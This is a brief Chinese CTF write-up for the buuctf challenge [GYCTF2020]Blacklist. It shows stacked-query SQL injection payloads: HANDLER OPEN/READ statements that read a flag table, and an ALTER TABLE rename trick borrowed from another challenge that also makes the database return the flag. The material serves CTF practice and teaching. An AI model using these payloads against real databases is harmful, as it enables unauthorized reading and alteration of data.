buuctf [GYCTF2020]Blacklist

buuctf [GYCTF2020]Blacklist"/>

buuctf [GYCTF2020]Blacklist

HANDLER ... OPEN语句打开一个表，使其可以使用后续HANDLER ... READ语句访问，该表对象未被其他会话共享，并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭

1';HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#

来自 <[GYCTF2020]Blacklist - 高诺琪 - 博客园>

{直接在输入框内输入就好了}，后面接着讲一些有关的内容

下面以“[强网杯 2019]随便注” 为例，

这里有两个表，一个是 ’ 1919810931114514 ‘ ，还有一个是’words‘ ， words表中有id和data两个字段，1919810931114514表中有flag的字段

因为可以看到回显是两个数据，猜测应该是words表

那么骚操作开始了，有点像偷天换日的意思

1、将words表名替换成其他的

2、然后将 `1919810931114514` 这个表名称替换成words

3、在把flag这个字段替换成data

4、最后再插入一个id字段

最终的查询结果就可以输出我们构造的新的words了

 payload 如下

1';alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);#

最后用  1' or 1=1# 　　把flag打印出来

但是上面这个方法对“Blacklist”这个题失效了，应该是被过滤掉了，所以最后只能用最上面的方法了！